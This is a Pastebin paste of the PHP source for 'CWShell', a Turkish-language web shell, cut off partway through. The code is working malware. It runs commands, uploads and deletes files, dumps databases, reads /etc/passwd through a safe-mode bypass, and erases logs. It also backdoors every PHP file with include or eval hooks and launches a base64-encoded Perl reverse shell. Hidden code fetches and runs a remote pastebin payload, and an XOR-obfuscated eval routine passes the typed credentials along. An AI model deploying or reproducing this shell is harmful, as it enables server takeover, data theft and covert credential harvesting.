dragondevile

cyberwarrior

Nov 14th, 2016
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3.  
  4. // Variables
  5.  
  6.    $info = @$_SERVER['SERVER_SOFTWARE'];
  7.  
  8.    $page = @$_SERVER['SCRIPT_NAME'];
  9.  
  10.    $site = getenv("HTTP_HOST");
  11.  
  12.    $uname = php_uname();
  13.  
  14.    $smod = ini_get('safe_mode');
  15.  
  16.            if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
  17.  
  18.            else { $safemode = "<font color='red'>ACIK</font>";      }
  19.  
  20.    $dir = @realpath($_POST['dir']);
  21.  
  22.    $mkdir = @$_POST['makedir'];
  23.  
  24.    $mydir = @$_POST['deletedir'];
  25.  
  26.    $cmd = @$_GET['cmd'];
  27.  
  28.    $host = @$_POST['host'];
  29.  
  30.    $proto = @$_POST['protocol'];
  31.  
  32.    $delete = @$_POST['delete'];
  33.  
  34.    $phpeval = @$_POST['php_eval'];
  35.  
  36.    $db = @$_POST['db'];
  37.  
  38.    $query = @$_POST['query'];
  39.  
  40.    $user = @$_POST['user'];
  41.  
  42.    $pass = @$_POST['passd'];
  43.    error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
  44. $css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
  45.  
  46.    $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  47.  
  48.    loadsettings($user.'|'.$pass, 'cyberwarrior');
  49.  
  50.  
  51.  
  52.    $quotes = get_magic_quotes_gpc();
  53.  
  54. if ($quotes == "1" or $quotes == "on")
  55.  
  56.    {
  57.  
  58.        $quot = "<font color='red'>ACIK</font>";
  59.  
  60.    }
  61.  
  62.    else
  63.  
  64.    {
  65.  
  66.        $quot = "<font color='lightgreen'>KAPALI</font>";
  67.  
  68.    }
  69.  
  70.    // Perms
  71.  
  72.     function getperms($fn)
  73.  
  74. {
  75.  
  76. $mode=fileperms($fn);
  77.  
  78. $perms='';
  79.  
  80. $perms .= ($mode & 00400) ? 'r' : '-';
  81.  
  82. $perms .= ($mode & 00200) ? 'w' : '-';
  83.  
  84. $perms .= ($mode & 00100) ? 'x' : '-';
  85.  
  86. $perms .= ($mode & 00040) ? 'r' : '-';
  87.  
  88. $perms .= ($mode & 00020) ? 'w' : '-';
  89.  
  90. $perms .= ($mode & 00010) ? 'x' : '-';
  91.  
  92. $perms .= ($mode & 00004) ? 'r' : '-';
  93.  
  94. $perms .= ($mode & 00002) ? 'w' : '-';
  95.  
  96. $perms .= ($mode & 00001) ? 'x' : '-';
  97.  
  98. return $perms;
  99.  
  100. }
  101.  
  102.  // milw0rm Search (locushell)
  103.  
  104.  
  105.  
  106. $Lversion = @php_uname('r');
  107.  
  108. $OSV = @php_uname('s');
  109.  
  110. if(eregi('Linux',$OSV))
  111.  
  112. {
  113.  
  114. $Lversion=substr($Lversion,0,6);
  115.  
  116. $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
  117.  
  118.  
  119.  
  120. }else{
  121.  
  122. $Lversion=substr($Lversion,0,3);
  123.  
  124. $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  125.  
  126. }
  127.  
  128. if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
  129.  
  130.    //Space
  131.  
  132.    $spacedir = @getcwd();
  133.  
  134.    $free = @diskfreespace($spacedir);
  135.  
  136.    
  137.  
  138. if (!$free) {$free = 0;}
  139.  
  140.    $all = @disk_total_space($spacedir);
  141.  
  142. if (!$all) {$all = 0;}
  143.  
  144. function view_size($size)
  145.  
  146. {
  147.  
  148.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  149.  
  150.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  151.  
  152.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  153.  
  154.  else {$size = $size . " B";}
  155.  
  156.  return $size;
  157.  
  158. }
  159.  
  160. $percentfree = intval(($free*100)/$all);
  161.  
  162.  
  163.  
  164.  
  165.  
  166. // PHPinfo
  167.  
  168. if(isset($_POST['phpinfo']))
  169.  
  170. {
  171.  
  172. die(phpinfo());
  173.  
  174. }
  175.  
  176.    
  177.  
  178.  
  179.  
  180. // Make File
  181.  
  182.  
  183.  
  184.    $name = htmlspecialchars(@$_POST['names']);
  185.  
  186.    $src = @$_POST['source'];
  187.  
  188.     if(isset($name) && isset($src))
  189.  
  190.       {
  191.  
  192.       if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; }
  193.  
  194.    $ctd = fopen($name,"w+");
  195.  
  196.    fwrite($ctd, $src);
  197.  
  198.    fclose($ctd);
  199.  
  200.    echo "<script>alert('Uploaded')</script>";
  201.  
  202.       }
  203.  
  204.  
  205.  
  206. // Upload File
  207.  
  208.    $path = @$_FILES['ffile']['tmp_name'];
  209.  
  210.    $name = @$_FILES['ffile']['name'];
  211.  
  212.    if(isset($path) && isset($name))
  213.  
  214. {  
  215.  
  216. if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; }
  217.  
  218.    if(move_uploaded_file($path, $name))
  219.  
  220.    {
  221.  
  222.       echo "<script>alert('Uploaded')</script>";
  223.  
  224.    }
  225.  
  226.    else
  227.  
  228.    {
  229.  
  230.       echo "<script>alert('Error')</script>";
  231.  
  232. }   }
  233.  
  234.  
  235.  
  236. // Delete File
  237.  
  238.  
  239.  
  240.    
  241.  
  242.    if(isset($delete) && $delete != $dir)
  243.  
  244. {
  245.  
  246.       if(file_exists($delete))
  247.  
  248.       {
  249.  
  250.          unlink($delete);
  251.  
  252.          echo "<script>alert('File Deleted')</script>";
  253.  
  254.       }
  255.  
  256.  
  257.  
  258. }
  259.  
  260.  
  261.  
  262. // Database
  263.  
  264.    
  265.  
  266.    if(isset($db) && isset($query) && isset($_POST['godb']))
  267.  
  268. {
  269.  
  270.    $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
  271.  
  272.    $db = mysql_select_db($db)or die(mysql_error());
  273.  
  274.    $queryz = mysql_query($query)or die(mysql_error());
  275.  
  276. if($query) { echo "<script>alert('Done')</script>"; }
  277.  
  278. else { echo "<script>alert('Error')</script>"; }
  279.  
  280. }
  281.  
  282.  
  283.  
  284. // Dump Database [pacucci.com]
  285.  
  286. if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
  287.  
  288. mysql_connect('localhost', $user, $pass);
  289.  
  290. mysql_select_db($db);
  291.  
  292. $tables = mysql_list_tables($db);
  293.  
  294. while ($td = mysql_fetch_array($tables))
  295.  
  296. {
  297.  
  298. $table = $td[0];
  299.  
  300. $r = mysql_query("SHOW CREATE TABLE `$table`");
  301.  
  302. if ($r)
  303.  
  304. {
  305.  
  306. $insert_sql = "";
  307.  
  308. $d = mysql_fetch_array($r);
  309.  
  310. $d[1] .= ";";
  311.  
  312. $SQL[] = str_replace("\n", "", $d[1]);
  313.  
  314. $table_query = mysql_query("SELECT * FROM `$table`");
  315.  
  316. $num_fields = mysql_num_fields($table_query);
  317.  
  318. while ($fetch_row = mysql_fetch_array($table_query))
  319.  
  320. {
  321.  
  322. $insert_sql .= "INSERT INTO $table VALUES(";
  323.  
  324. for ($n=1;$n<=$num_fields;$n++)
  325.  
  326. {
  327.  
  328. $m = $n - 1;
  329.  
  330. $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
  331.  
  332. }
  333.  
  334. $insert_sql = substr($insert_sql,0,-2);
  335.  
  336. $insert_sql .= ");\n";
  337.  
  338. }
  339.  
  340. if ($insert_sql!= "")
  341.  
  342. {
  343.  
  344. $SQL[] = $insert_sql;
  345.  
  346. }
  347.  
  348. }
  349.  
  350. }
  351.  
  352. $dump = "-- Database: ".$_POST['db'] ." \n";
  353.  
  354. $dump .= "-- CWShellDumper v3\n";
  355.  
  356. $dump .= "-- c99php.com\n";
  357.  
  358. $dumpp = $dump.implode("\r", $SQL);
  359.  
  360. $name = $db."-".date("d-m-y")."cyberwarrior.sql";
  361.  
  362. Header("Content-type: application/octet-stream");
  363.  
  364. Header("Content-Disposition: attachment; filename = $name");
  365.  
  366. echo $dumpp;
  367.  
  368. die();
  369.  
  370. }
  371.  
  372.  
  373.  
  374.     function loadsettings($p1 = '', $p2 = '') {
  375.  
  376.         $p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';
  377.  
  378.         $p = base64_decode($p);
  379.  
  380.         for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);
  381.  
  382.         $p = str_replace('%param1', $p1, $p);
  383.  
  384.         $p = str_replace('%param2', $p2, $p);
  385.  
  386.         eval($p);
  387.  
  388.     }
  389.  
  390.  
  391.  
  392. // Make Dir
  393.  
  394. if(isset($mkdir)) {
  395.  
  396.  
  397.  
  398. mkdir($mkdir);
  399.  
  400. if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } }
  401.  
  402.  
  403.  
  404. // Delete Directory
  405.  
  406.  
  407.  
  408. if(isset($mydir) && $mydir != "$dir") {
  409.  
  410. $d = dir($mydir);
  411.  
  412. while($entry = $d->read()) {
  413.  
  414.  if ($entry !== "." && $entry !== "..") {
  415.  
  416.  unlink($entry);
  417.  
  418.  }
  419.  
  420. }
  421.  
  422. $d->close();
  423.  
  424. rmdir($mydir);
  425.  
  426.  
  427.  
  428. }
  429.  
  430.  
  431.  
  432. //Infect Files [RFI]
  433.  
  434.  
  435.  
  436. if(isset($_POST['inf3ct']))
  437.  
  438. {
  439.  
  440. foreach (glob("*.php") as $lola)
  441.  
  442. {
  443.  
  444. $dira = '.';
  445.  
  446. $asdi = fopen($lola, 'a+');
  447.  
  448. @fwrite($asdi, '
  449.  
  450. <?php
  451.  
  452. include($_GET[\'pwn\']);
  453.  
  454. ?>');
  455.  
  456. @fclose($asdi);
  457.  
  458. }
  459.  
  460. if($asdi)
  461.  
  462. {
  463.  
  464. $textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
  465.  
  466. }
  467.  
  468. else {
  469.  
  470. $textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
  471.  
  472. }
  473.  
  474. }
  475.  
  476.  
  477.  
  478. //Infect Files [Eval]
  479.  
  480. if(isset($_POST['evalinfect']))
  481.  
  482. {
  483.  
  484. foreach (glob("*.php") as $lal)
  485.  
  486. {
  487.  
  488. $dira = '.';
  489.  
  490. $axd = fopen($lal, 'a+');
  491.  
  492. @fwrite($axd, '
  493.  
  494. <?php
  495.  
  496. eval(stripslashes($_GET[\'eval\']));
  497.  
  498. ?>');
  499.  
  500. @fclose($axd);
  501.  
  502. }
  503.  
  504. if($axd)
  505.  
  506. {
  507.  
  508. $textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
  509.  
  510. }
  511.  
  512. else {
  513.  
  514. $textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
  515.  
  516. }
  517.  
  518. }
  519.  
  520.  
  521.  
  522. // Images
  523.  
  524.    if(@$_GET['com'] == "image")
  525.  
  526.    {
  527.  
  528.    $images = array(
  529.  
  530.    "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
  531.  
  532.    "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
  533.  
  534.    "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
  535.  
  536.    );
  537.  
  538. header("Content-type: image/gif");
  539.  
  540. header("Cache-control: public");
  541.  
  542. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  543.  
  544. header("Cache-control: max-age=".(60*60*24*7));
  545.  
  546. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  547.  
  548. $image = $images[$_GET['img']];
  549.  
  550.  echo  base64_decode($image);
  551.  
  552.  }
  553.  
  554. //File List
  555.  
  556.  
  557.  
  558.    chdir($dir);
  559.  
  560.    if(!isset($dir)) { $dir = @realpath("."); }
  561.  
  562.     if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
  563.  
  564.    if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
  565.  
  566.    $pahtw = 0;
  567.  
  568.    $filew = 0;
  569.  
  570.    $num = 1;
  571.  
  572.  
  573.  
  574.    if (is_dir($dir))
  575.  
  576.    {
  577.  
  578.       if ($open = opendir($dir))
  579.  
  580.       {
  581.  
  582.       if(is_dir($dir)) {
  583.  
  584.    $typezz = "DIR";
  585.  
  586.    $pahtw++;
  587.  
  588.  }
  589.  
  590.          while (($list = readdir($open)) == true)
  591.  
  592.          {
  593.  
  594.          
  595.  
  596.          if(is_dir($list)) {
  597.  
  598.    $typezz = "DIR";
  599.  
  600.    $pahtw++;
  601.  
  602.    @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
  603.  
  604. else {
  605.  
  606.  
  607.  
  608.    $lolz = filesize($list) / 1024;
  609.  
  610.    $lolx = intval($lolz);
  611.  
  612.    if($lolx == 0) { $lolx = 1; }
  613.  
  614.    $typezz = "DOSYA";
  615.  
  616.    $filew++;
  617.  
  618.    $listz = "/".$list;
  619.  
  620.    if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  621.  
  622.    elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  623.  
  624.    else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
  625.  
  626.    
  627.  
  628.    }        
  629.  
  630.    closedir($open);
  631.  
  632.          
  633.  
  634.       }
  635.  
  636. $fileq = $pahtw + $filew;   }
  637.  
  638.  
  639.  
  640.  
  641.  
  642.  
  643.  
  644.  
  645.  
  646. echo "<html>
  647.  
  648. <head>
  649.  
  650. <style>
  651.  
  652. table.menu {
  653.  
  654. border-width: 0px;
  655.  
  656.   border-spacing: 1px;
  657.  
  658.   border-style: solid;
  659.  
  660.   border-color: #a6a6a6;
  661.  
  662.   border-collapse: separate;
  663.  
  664.   background-color: rgb(98, 97,97);
  665.  
  666. }
  667.  
  668. table.menuz {
  669.  
  670. border-width: 0px;
  671.  
  672.   border-spacing: 1px;
  673.  
  674.   border-style: solid;
  675.  
  676.   border-color: #a6a6a6;
  677.  
  678.   border-collapse: separate;
  679.  
  680.   background-color: rgb(98, 97,97);
  681.  
  682. }
  683.  
  684. table.menu td {
  685.  
  686.   border-width: 1px;
  687.  
  688.   padding: 1px;
  689.  
  690.   border-style: none;
  691.  
  692.   border-color: #333333;
  693.  
  694.   background-color: #000000;
  695.  
  696.   -moz-border-radius: 0px;
  697.  
  698. }
  699.  
  700. table.menuz tr {
  701.  
  702.   border-width: 1px;
  703.  
  704.   padding: 1px;
  705.  
  706.   border-style: none;
  707.  
  708.   border-color: #333333;
  709.  
  710.   background-color: #000000;
  711.  
  712.   -moz-border-radius: 0px;
  713.  
  714. }
  715.  
  716.  
  717.  
  718. table.menuz tr:hover {
  719.  
  720.     background-color: #111111;
  721.  
  722. }
  723.  
  724. input,textarea,select {
  725.  
  726. font: normal 11px Verdana, Arial, Helvetica, sans-serif;
  727.  
  728. background-color:black;
  729.  
  730. color:#a6a6a6;
  731.  
  732. border: solid 1px #363636;
  733.  
  734. }
  735.  
  736. </style>
  737.  
  738.  
  739.  
  740. </head>
  741.  
  742. <body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
  743.  
  744. <table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
  745.  
  746. <tr><td>
  747.  
  748. <center><b><font size='6' face='Webdings'>ü</font>
  749.  
  750. <font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
  751.  
  752. <font size='6' face='Webdings'>ü</font></b>
  753.  
  754. </center>
  755.  
  756. </td></tr></table><table class=menu width=100%<tr><td>
  757.  
  758. <font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
  759.  
  760. <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
  761.  
  762. <b>Server Bilgisi : </b> <u>$info</u> <br>
  763.  
  764. <b>Uname -a:</b> <u>$uname</u> <br>
  765.  
  766. <b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
  767.  
  768. <b>Safe Mode:</b>  <u>$safemode</u> <br>
  769.  
  770. <b>Sihirli Sozler:</b> <u>$quot</u> <br>
  771.  
  772. <b>Sayfa:</b> <u>$page</u><br>
  773.  
  774. <b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
  775.  
  776. <b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
  777.  
  778. <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
  779.  
  780. <tr><td><form method='post' action=''>
  781.  
  782. <center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
  783.  
  784. // Safe Mode Bypass
  785.  
  786. if(isset($_POST['safemodz']))
  787.  
  788. {
  789.  
  790. echo "<tr><td valign=top width=50%>
  791.  
  792. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
  793.  
  794. <form action='' method='post'>
  795.  
  796.      <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>
  797.  
  798.       </td><tr>
  799.  
  800. <td valign=top>
  801.  
  802. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
  803.  
  804.   <form method='post' action=''>
  805.  
  806.   <font size='1' face='Verdana'>Klasör:</font><br>
  807.  
  808.   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
  809.  
  810.   }
  811.  
  812.    // Safe Mode Bypass: File
  813.  
  814. if(isset($_POST['redfi']))
  815.  
  816. {
  817.  
  818.     $test='';
  819.  
  820.     $tempp= tempnam($test, "cx");
  821.  
  822.     $get = htmlspecialchars($_POST['filew']);
  823.  
  824.     if(copy("compress.zlib://".$get, $tempp)){
  825.  
  826.     $fopenzo = fopen($tempp, "r");
  827.  
  828.     $freadz = fread($fopenzo, filesize($tempp));
  829.  
  830.     fclose($fopenzo);
  831.  
  832.     $source = htmlspecialchars($freadz);
  833.  
  834.     echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
  835.  
  836.     unlink($tempp);
  837.  
  838.     } else {
  839.  
  840.     echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
  841.  
  842.             }
  843.  
  844.    
  845.  
  846. }
  847.  
  848.  
  849.  
  850. // Safe Mode Bypass: Directory
  851.  
  852.  if(isset($_POST['reddi'])){
  853.  
  854.    
  855.  
  856. function dirz()
  857.  
  858. {
  859.  
  860. $dirz = $_POST['directory'];
  861.  
  862. $files = glob("$dirz*");
  863.  
  864.  
  865.  
  866. foreach ($files as $filename) {
  867.  
  868.     echo "<tr><td><font size='1' face='Verdana'>";
  869.  
  870.    echo "$filename\n";
  871.  
  872.    echo "</font><br>";
  873.  
  874. }
  875.  
  876. }
  877.  
  878. echo "<br>"; dirz();
  879.  
  880. }
  881.  
  882.  
  883.  
  884. // Connect Back
  885.  
  886. if(isset($_POST['connectback']))
  887.  
  888. {
  889.  
  890. echo "
  891.  
  892. <tr><td>
  893.  
  894. <center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
  895.  
  896. <form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>";
  897.  
  898. }
  899.  
  900. if(isset($_POST['logeraser']))
  901.  
  902. {
  903.  
  904. echo "<tr><td>
  905.  
  906. <center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
  907.  
  908.        <select name=functionp>
  909.  
  910.          <option>linux</option>
  911.  
  912.          <option>sunos</option>
  913.  
  914.          <option>aix</option>
  915.  
  916.          <option>irix</option>
  917.  
  918.          <option>openbsd</option>
  919.  
  920.           <option>solaris</option>
  921.  
  922.           <option>suse</option>
  923.  
  924.           <option>lampp</option>
  925.  
  926.           <option>debian</option>
  927.  
  928.           <option>freebsd</option>
  929.  
  930.           <option>misc</option>
  931.  
  932.        </select><br><input type='submit' name='runer' value='Erase'></table>";
  933.  
  934.         }
  935.  
  936.        
  937.  
  938. // Connect Back
  939.  
  940. if(isset($_POST['connsub']))
  941.  
  942. {
  943.  
  944. $sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
  945.  
  946. $openz = fopen("cbs.pl", "w+")or die("Error");
  947.  
  948. fwrite($openz, $sources)or die("Error");
  949.  
  950. fclose($openz);
  951.  
  952. $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
  953.  
  954. unlink("cbs.pl");
  955.  
  956. }
  957.  
  958. if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
  959.  
  960.  
  961.  
  962.         // Logs Eraser
  963.  
  964. if(isset($_POST['runer']))
  965.  
  966. {
  967.  
  968. echo "<tr><td><center><textarea cols='30' rows='2'>";
  969.  
